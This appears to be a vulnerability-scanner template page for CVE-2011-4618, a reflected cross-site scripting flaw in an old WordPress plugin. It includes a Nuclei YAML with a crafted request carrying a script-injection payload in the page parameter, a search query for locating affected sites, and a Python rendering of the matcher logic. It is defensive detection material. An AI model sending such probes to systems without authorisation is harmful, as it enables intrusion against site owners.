Advanced Text Widget < 2.0.2 - Cross-Site Scripting
ID: CVE-2011-4618
Severity: medium
Author: daffainfo
Tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme
Description
A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
YAML Source
id: CVE-2011-4618

info:
  name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
  impact: |
    Allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4618
    - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities
    - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/
    - http://www.openwall.com/lists/oss-security/2011/12/19/6
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-4618
    cwe-id: CWE-79
    epss-score: 0.01913
    epss-percentile: 0.88293
    cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: simplerealtytheme
    product: advanced_text_widget_plugin
    google-query: inurl:"/wp-content/plugins/advanced-text-widget"
  tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme

http:
  - raw:
      - |
        GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "</script><script>alert(document.domain)</script>")'
          - 'contains(body_1, "Advanced Text Widget")'
        condition: and
# digest: 490a004630440220491841e64f0fab7743a73000cacfe1af3898760fe8a21ced532cbefe72eee36b02205aa967dd54d99496d6d6017d9e4fbb25c215f41dbc58ffde0d31048df0220061:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2011/CVE-2011-4618.yaml"
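The template's matcher block, re-expressed as an added Python example (not part of the template or of Nuclei): all four DSL conditions are joined with `and`, so an HTML-escaped reflection, a non-HTML content type, or a readme that belongs to a different plugin each prevent a match. The `render` and `response` helpers and every response below are constructed stand-ins, not the plugin's code or captured traffic.

```python
import html

# String the template expects to find, unencoded, in the second response body.
PAYLOAD = "</script><script>alert(document.domain)</script>"


def template_matches(readme, probe):
    """Apply the template's four DSL conditions (condition: and).

    readme and probe are dicts with 'status', 'headers' and 'body',
    standing in for responses 1 and 2 of the template.
    """
    return all([
        probe["status"] == 200,                    # status_code_2 == 200
        "text/html" in probe["headers"],           # contains(header_2, "text/html")
        PAYLOAD in probe["body"],                  # contains(body_2, "<payload>")
        "Advanced Text Widget" in readme["body"],  # contains(body_1, "Advanced Text Widget")
    ])


def render(page_value, escape):
    """Hypothetical page that echoes the ?page= value into its HTML output."""
    value = html.escape(page_value) if escape else page_value
    return "<html><body>" + value + "</body></html>"


def response(body, content_type="text/html; charset=UTF-8", status=200):
    """Build a constructed response record for the checks above."""
    return {"status": status, "headers": "Content-Type: " + content_type, "body": body}


# Constructed sample responses (assumptions for illustration only).
README = response("=== Advanced Text Widget ===", content_type="text/plain")
OTHER_README = response("=== Some Other Plugin ===", content_type="text/plain")
UNESCAPED = response(render(PAYLOAD, escape=False))
ESCAPED = response(render(PAYLOAD, escape=True))
AS_JSON = response(render(PAYLOAD, escape=False), content_type="application/json")

if __name__ == "__main__":
    for label, first, second in [
        ("raw reflection, text/html", README, UNESCAPED),
        ("HTML-escaped reflection", README, ESCAPED),
        ("raw reflection, application/json", README, AS_JSON),
        ("readme of a different plugin", OTHER_README, UNESCAPED),
    ]:
        print(label, "->", template_matches(first, second))
```

Only the first case satisfies every condition; output encoding of the `page` value is what turns the third condition false on a fixed installation.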